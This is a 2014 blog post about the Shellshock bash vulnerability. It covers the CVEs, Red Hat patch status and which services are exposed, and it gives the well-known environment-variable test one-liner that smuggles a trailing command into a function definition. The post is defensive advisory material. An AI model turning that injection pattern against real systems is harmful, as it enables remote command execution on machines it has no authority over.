Sep 242014

More detailed info:×specially-crafted-environment-variables-code-injection-attack/

Stephane Chazelas discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name. In many common configurations, this vulnerability is exploitable over the network.

Chet Ramey, the GNU bash upstream maintainer, will soon release official upstream patches.

Just a heads up, most of not all mirrors for RH/CentOS were updated last night and crons should handle the updates.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
will test for this issue…


As of approx 23:10 Eastern Time, 2014-09-24, an addendum CVE has been submitted in regards to CVE-2014-6271. Quoting Red Hat:

“Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions.”

The follow-up has been assigned as CVE-2014-7169. A patch is in the works according to vendors, but but has not yet neen pushed. Expect another bash revision version in the pipelines shortly.

In the meantime, RHEL provides details for a work-around, but cautions that the implementation has received very little testing, and is no substitution for the impending patch. I’m choosing not to quote them here, based on that reasoning entirely, but you can read about it in the preceding Red Hat pages above.

^^^See above links^^^

Fixed? we shall see…
[[email protected]] ~ >> env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

RedHat has suggested rebooting OR running ldconfig after the update. (ldconfig creates, updates, and removes the necessary links and cache to the most recent shared libraries). However, simply updating the bash rpm itself will solve the issue for any and all newly invoked bash instances which should cover the majority of any potential issues.  

Exploit details:
The way this bug is exploited is anything that that first sticks some Internet parameter in an environmental variable, and then executes a bash script. Thus, simply calling bash isn’t the problem. Thus, some things (like PHP apparently) aren’t necessarily vulnerable, but other things (like CGI shell scripts) are vulnerable as all get out. For example, a lot of wireless routers shell out to “ping” and “traceroute” — these are all likely vulnerable.

 Posted by at 3:02 pm